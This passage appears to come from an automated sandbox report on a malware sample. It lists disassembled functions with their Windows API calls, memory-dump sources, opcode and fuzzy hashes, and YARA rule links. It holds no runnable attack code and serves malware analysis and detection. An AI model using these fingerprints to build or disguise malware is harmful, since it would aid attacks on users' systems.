                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CriticalEnterEnumLocalesSectionSystem
                                                  • String ID:
                                                  • API String ID: 1272433827-0
                                                  • Opcode ID: 294c88a1965c44704c377604ff0a5917817e93c6b6b84f866ad5a3c5a2dedf6a
                                                  • Instruction ID: 877f7ae5c491a2fbf36f534f7b8138893028b6a81f24f5c3744eb9f6a7677366
                                                  • Opcode Fuzzy Hash: 294c88a1965c44704c377604ff0a5917817e93c6b6b84f866ad5a3c5a2dedf6a
                                                  • Instruction Fuzzy Hash: F6F04932A10200EFEB04EF68E806B4D77B0EB44725F10816AF414DB2E2DB7889818B49
                                                  Function 02137315 Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 02134D33: RtlEnterCriticalSection.NTDLL(?), ref: 02134D42
                                                  • EnumSystemLocalesW.KERNEL32(00447068,00000001,0046DC48,0000000C), ref: 0213734D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CriticalEnterEnumLocalesSectionSystem
                                                  • String ID:
                                                  • API String ID: 1272433827-0
                                                  • Opcode ID: 294c88a1965c44704c377604ff0a5917817e93c6b6b84f866ad5a3c5a2dedf6a
                                                  • Instruction ID: 67f2c84088e4500827af82334477c2c7ad74207357822cfbac53d1aa06ac12da
                                                  • Opcode Fuzzy Hash: 294c88a1965c44704c377604ff0a5917817e93c6b6b84f866ad5a3c5a2dedf6a
                                                  • Instruction Fuzzy Hash: DFF04972A90204EFD705EF68E805B5D77B2EB45321F108166F814DB2E0CB7489858F99
                                                  Function 00450CF7 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                    • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                    • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                    • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                  • EnumSystemLocalesW.KERNEL32(00450C4E,00000001,?,?,?,004514B9,<D,?,?,?,?,?,00443CEC,?,?,?), ref: 00450D2E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                  • String ID:
                                                  • API String ID: 1084509184-0
                                                  • Opcode ID: 8c2bccbfd0fc102635c006ca31f830fd57f68f19690e6c985b1f52cdbb333b18
                                                  • Instruction ID: ec648f77c102ae861fabd43d141f98194b25f4d0b1f390d0839222eb7000fb0b
                                                  • Opcode Fuzzy Hash: 8c2bccbfd0fc102635c006ca31f830fd57f68f19690e6c985b1f52cdbb333b18
                                                  • Instruction Fuzzy Hash: CBF05C3D30020557CB159F35D81576B7F94EFC2711B07405AFE098B381C239D846C754
                                                  Function 02140F5E Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 02137126: GetLastError.KERNEL32(?,0212E4C7,02129583,0212E4C7,00475B70,?,0212BBBC,FF8BC35D,00475B70,00473EE8), ref: 0213712A
                                                    • Part of subcall function 02137126: _free.LIBCMT ref: 0213715D
                                                    • Part of subcall function 02137126: SetLastError.KERNEL32(00000000,FF8BC35D,00475B70,00473EE8), ref: 0213719E
                                                    • Part of subcall function 02137126: _abort.LIBCMT ref: 021371A4
                                                  • EnumSystemLocalesW.KERNEL32(00450C4E,00000001,?,?,?,02141720,02133F53,?,?,?,?,?,02133F53,?,?,?), ref: 02140F95
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                  • String ID:
                                                  • API String ID: 1084509184-0
                                                  • Opcode ID: 8c2bccbfd0fc102635c006ca31f830fd57f68f19690e6c985b1f52cdbb333b18
                                                  • Instruction ID: 793c1353d4297126b4debc17fc35b75385752634825dd7ff253c700a2f3a4ba6
                                                  • Opcode Fuzzy Hash: 8c2bccbfd0fc102635c006ca31f830fd57f68f19690e6c985b1f52cdbb333b18
                                                  • Instruction Fuzzy Hash: B8F0E53A34020557CB19AF36DC45B6ABF95EFC6711B0640A9FA098B691CB75A882CB50
                                                  Function 0040E679 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004145AD,00473EE8,00474A10,00473EE8,00000000,00473EE8,?,00473EE8,5.3.0 Pro), ref: 0040E68D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: InfoLocale
                                                  • String ID:
                                                  • API String ID: 2299586839-0
                                                  • Opcode ID: b50e3ea1a872d37ae34c654cd7c515b10d61925b85636433c3a2d99c17233aa8
                                                  • Instruction ID: fdf89a5244b67fc368892e36cd71d3b7bc7b33248e42f87f25a9228cb5794c84
                                                  • Opcode Fuzzy Hash: b50e3ea1a872d37ae34c654cd7c515b10d61925b85636433c3a2d99c17233aa8
                                                  • Instruction Fuzzy Hash: E6D05E607002197BEA109291DC0AE9B7A9CE700B66F000165BA01E72C0E9A0AF008AE1
                                                  Function 020FE8E0 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,02104814,00473EE8,00474A10,00473EE8,00000000,00473EE8,?,00473EE8,0046673C), ref: 020FE8F4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: InfoLocale
                                                  • String ID:
                                                  • API String ID: 2299586839-0
                                                  • Opcode ID: 5e9075a3806edf431e091a568af27ae769e925cdac090a6302122e919684f26a
                                                  • Instruction ID: 9aaf23144e2217e166ca68b1a74467b700bfa778c1e6419f58452672c8cc32bb
                                                  • Opcode Fuzzy Hash: 5e9075a3806edf431e091a568af27ae769e925cdac090a6302122e919684f26a
                                                  • Instruction Fuzzy Hash: FAD09E657842187BEA1496959C0AEDB7A9CE741B96F000165BA01D72C0E9A0AE049AE5
                                                  Function 004260F7 Relevance: 1.5, APIs: 1, Instructions: 7networkCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: recv
                                                  • String ID:
                                                  • API String ID: 1507349165-0
                                                  • Opcode ID: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
                                                  • Instruction ID: fbcf0fb35859d26dd0bec2a34c6193cd90ff2e5205aa97c5c9b80f8ed11fde70
                                                  • Opcode Fuzzy Hash: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
                                                  • Instruction Fuzzy Hash: 35B09279118202FFCA051B60DC0887ABEBAABCC381F108D2DB586501B0CA37C451AB26
                                                  Function 00433CD7 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetUnhandledExceptionFilter.KERNEL32(Function_00033CE3,004339B1), ref: 00433CDC
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled
                                                  • String ID:
                                                  • API String ID: 3192549508-0
                                                  • Opcode ID: 3670727f3e8651977646328ecd403d2a1b3c6ba49dd5bfb528ab2007e995f695
                                                  • Instruction ID: 83953e3dca8a62111c248ad4478ddd9c1373f985a30770e5fc8846644fe13ce9
                                                  • Opcode Fuzzy Hash: 3670727f3e8651977646328ecd403d2a1b3c6ba49dd5bfb528ab2007e995f695
                                                  • Instruction Fuzzy Hash:
                                                  Function 0043CE3B Relevance: 1.5, Strings: 1, Instructions: 237COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: BG3i@
                                                  • API String ID: 0-2407888476
                                                  • Opcode ID: da6bc0b681a35a8a8cd82b5b62752965acc1f5aabf11132faead2372da36057a
                                                  • Instruction ID: a817909710d0090f483bb13cdd1d1ee80d6dfae79024daed79820ace932836b2
                                                  • Opcode Fuzzy Hash: da6bc0b681a35a8a8cd82b5b62752965acc1f5aabf11132faead2372da36057a
                                                  • Instruction Fuzzy Hash: E361777160070966DA385A2858D6BBF6396EB0DB04F10391BE943FF3C1D61DAD43874E
                                                  Function 0043CC0C Relevance: 1.5, Strings: 1, Instructions: 214COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0
                                                  • API String ID: 0-4108050209
                                                  • Opcode ID: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                                                  • Instruction ID: e47b97b21f836cd03f295ee90de6feb37cae4df0254a032430ab3cefd666e269
                                                  • Opcode Fuzzy Hash: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                                                  • Instruction Fuzzy Hash: C851AC3160070457DF388A6985DA7BF6B959B0E700F18352FE48AFB382C60DED02979E
                                                  Function 0212CE73 Relevance: 1.5, Strings: 1, Instructions: 214COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0
                                                  • API String ID: 0-4108050209
                                                  • Opcode ID: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                                                  • Instruction ID: 2193aac1f80fcb9e6595062830afb9e4ec3c0c81de82c757752fa3b8ac88d271
                                                  • Opcode Fuzzy Hash: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                                                  • Instruction Fuzzy Hash: 635169726C46745BDB38CA7895547BF6B9A9B02308F1A081BFB42C7281D701DA3EC7D6
                                                  Function 0212CC44 Relevance: 1.5, Strings: 1, Instructions: 214COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0
                                                  • API String ID: 0-4108050209
                                                  • Opcode ID: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                                                  • Instruction ID: 80586d8d3ff66065199cd4aec6356b09564809389055445ab2ed12f931913d62
                                                  • Opcode Fuzzy Hash: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                                                  • Instruction Fuzzy Hash: 3F5156712C067C5BDB384A6884547FE2B95DB41348F0B190BFB868B291D302E63DC7D2
                                                  Function 00426E73 Relevance: 1.3, Strings: 1, Instructions: 96COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @
                                                  • API String ID: 0-2766056989
                                                  • Opcode ID: 277f5b14ebfb31d9acdfcb19b599133ffeee57438103c682c3dacb2c81b16d7f
                                                  • Instruction ID: 4dd25ef8aece06dcbd44762d080e1d81d96ea4c89eb3931c7e752ffea448aa68
                                                  • Opcode Fuzzy Hash: 277f5b14ebfb31d9acdfcb19b599133ffeee57438103c682c3dacb2c81b16d7f
                                                  • Instruction Fuzzy Hash: 99417576A083158FC314CE29D18021BFBE1FBC8300F568A2EF99693350D679E980CB86
                                                  Function 021170DA Relevance: 1.3, Strings: 1, Instructions: 96COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @
                                                  • API String ID: 0-2766056989
                                                  • Opcode ID: 277f5b14ebfb31d9acdfcb19b599133ffeee57438103c682c3dacb2c81b16d7f
                                                  • Instruction ID: 0600e533c1609e28fb84688072a4e1f208b86d896c3b38b51e6a7c61c5e4e7f5
                                                  • Opcode Fuzzy Hash: 277f5b14ebfb31d9acdfcb19b599133ffeee57438103c682c3dacb2c81b16d7f
                                                  • Instruction Fuzzy Hash: 994145729587058FC314CE29C18061BFBE1FBC8354F148A2EF99693394D775A981CF82
                                                  Function 0044E92E Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: HeapProcess
                                                  • String ID:
                                                  • API String ID: 54951025-0
                                                  • Opcode ID: c4eeb5daf7d20212f04cf1a35fe49476965deb7007d4ee0647dc212291e34da0
                                                  • Instruction ID: 9504a653bcf427532d5064532c05f1d04939bb5561e35e6535c2a7eba45b7a60
                                                  • Opcode Fuzzy Hash: c4eeb5daf7d20212f04cf1a35fe49476965deb7007d4ee0647dc212291e34da0
                                                  • Instruction Fuzzy Hash: 84A00270506201CB57404F756F0525937D9654559170580755409C5571D62585905615
                                                  Function 0044C739 Relevance: .6, Instructions: 637COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b5ca945c73f96586680b794a2cfc8b55e8f7bc2f58380cec5295694457d85c5e
                                                  • Instruction ID: 1fbb2d6a6e610910e1865e113166bba559d0ad1400e2c5ed2b94208389d41108
                                                  • Opcode Fuzzy Hash: b5ca945c73f96586680b794a2cfc8b55e8f7bc2f58380cec5295694457d85c5e
                                                  • Instruction Fuzzy Hash: 4E323621D2AF014DE7639634C862336A649AFB73C5F19D737F81AB5AA6EB2CC4C34105
                                                  Function 0041E5DF Relevance: .6, Instructions: 606COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f36ab663cb4d239ef1e0a5f108238eabc662f1d3d061ede5d5b4150ec9228ddd
                                                  • Instruction ID: 2a34495ee4f42e5442afe8381c33b9994a027dd0bc8bc0cc3fe6fc4803c66e78
                                                  • Opcode Fuzzy Hash: f36ab663cb4d239ef1e0a5f108238eabc662f1d3d061ede5d5b4150ec9228ddd
                                                  • Instruction Fuzzy Hash: 9732C1796087469BD714DF2AC4807ABB7E1BF84304F444A2EFC958B381D778DD858B8A
                                                  Function 0210E846 Relevance: .6, Instructions: 606COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a18e7bb7c2c42d1902aff7cdab2f32fbef15b0e2cf6e19f50b6dfc23c9c72e89
                                                  • Instruction ID: 0d33cf7a67882e0297e71a2eabfb852bbcd357d8a8652dc690ea260d14c18ef0
                                                  • Opcode Fuzzy Hash: a18e7bb7c2c42d1902aff7cdab2f32fbef15b0e2cf6e19f50b6dfc23c9c72e89
                                                  • Instruction Fuzzy Hash: BF328F716887459FC729DE29C4C076AB7E6BF84304F144E2DF8A5872C1DBB5D905CB82
                                                  Function 004267CB Relevance: .4, Instructions: 437COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 51f8d9063bc82676a5307432183369734bf664b3393a643c02daa012ce37ec01
                                                  • Instruction ID: 022d1978040d43b7ea9bbfc0a41ffb8b00617051ae00cac38c3f572af68edcce
                                                  • Opcode Fuzzy Hash: 51f8d9063bc82676a5307432183369734bf664b3393a643c02daa012ce37ec01
                                                  • Instruction Fuzzy Hash: 0D028F717046518FD318CF2EE880536B7E1AF8E301B46863EE585C7395EB74E922CB95
                                                  Function 02116A32 Relevance: .4, Instructions: 437COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 51f8d9063bc82676a5307432183369734bf664b3393a643c02daa012ce37ec01
                                                  • Instruction ID: 7c9a0f47149a3fba4ab5fcfa4321511f4088edd426390b975000414f4c2472dc
                                                  • Opcode Fuzzy Hash: 51f8d9063bc82676a5307432183369734bf664b3393a643c02daa012ce37ec01
                                                  • Instruction Fuzzy Hash: 7F028E717046518FD328CF2EE880636B7E1AF8A301746863EE4D5C7391EB35E926CB95
                                                  Function 00426254 Relevance: .4, Instructions: 377COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 74e588301cf54894560b91a60f0e3518b6bdc06a9ff6f3e52f80e31c4ce3b340
                                                  • Instruction ID: dd4ce2a6fae4266494c2f053a510589cf36d02151b1693af83bcfdcd1697f2cb
                                                  • Opcode Fuzzy Hash: 74e588301cf54894560b91a60f0e3518b6bdc06a9ff6f3e52f80e31c4ce3b340
                                                  • Instruction Fuzzy Hash: 55F13B716142548FC314DF1DE89187BB3E0EB8A301B460A2EF5C2D7392DB78E91ADB56
                                                  Function 021164BB Relevance: .4, Instructions: 377COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ae54c0c007aacb93a7dd55fc151a9a0813301b4ecfdd70e7c81fd1d8629b8821
                                                  • Instruction ID: 3d145a6d080582b6047bb5fd0ccadcf16fd4680d842a3e27463e5a987b8cfe85
                                                  • Opcode Fuzzy Hash: ae54c0c007aacb93a7dd55fc151a9a0813301b4ecfdd70e7c81fd1d8629b8821
                                                  • Instruction Fuzzy Hash: 4DF16C716142548FC318DF1DE89087BB3E5EB8A301B460A2EF1C2D7391DB75EA1ACB56
                                                  Function 00431377 Relevance: .4, Instructions: 371COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7363a9fedaeb76f2bf31ad894624b0994c444190ff40f401d8ef5418a52334f3
                                                  • Instruction ID: a134442df30985c3d9ded0ed06b90328dea8838589cb671b1bd0994677c35241
                                                  • Opcode Fuzzy Hash: 7363a9fedaeb76f2bf31ad894624b0994c444190ff40f401d8ef5418a52334f3
                                                  • Instruction Fuzzy Hash: 60D1A171A083158BC721DE29C88096FB7E4FFD8354F446A2EF88597361EB38DD058B86
                                                  Function 0041D071 Relevance: .3, Instructions: 276COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1d5f87b89f6cc3a45a9bf331663a41d894a757e8db0ddd404c7656d5df1518eb
                                                  • Instruction ID: 86422b113df266cbb8d28aa4d41e6099a1760efb4c6ea83322c03ecd969c618c
                                                  • Opcode Fuzzy Hash: 1d5f87b89f6cc3a45a9bf331663a41d894a757e8db0ddd404c7656d5df1518eb
                                                  • Instruction Fuzzy Hash: 46B1817951429A8ACB05EF28C4913F63BA1EF6A300F4851B9EC9CCF757D3399506EB24
                                                  Function 0210D2D8 Relevance: .3, Instructions: 276COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1d5f87b89f6cc3a45a9bf331663a41d894a757e8db0ddd404c7656d5df1518eb
                                                  • Instruction ID: 1faf3ab6a4c853c886bda351cf8f337822861ee4790bbaee289db5bccf390b9f
                                                  • Opcode Fuzzy Hash: 1d5f87b89f6cc3a45a9bf331663a41d894a757e8db0ddd404c7656d5df1518eb
                                                  • Instruction Fuzzy Hash: 5DB183791142998BCB05EF68C4913F63BA1EF6A300F0851B9EC9CCF756E3758506EB64
                                                  Function 0043D098 Relevance: .2, Instructions: 237COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
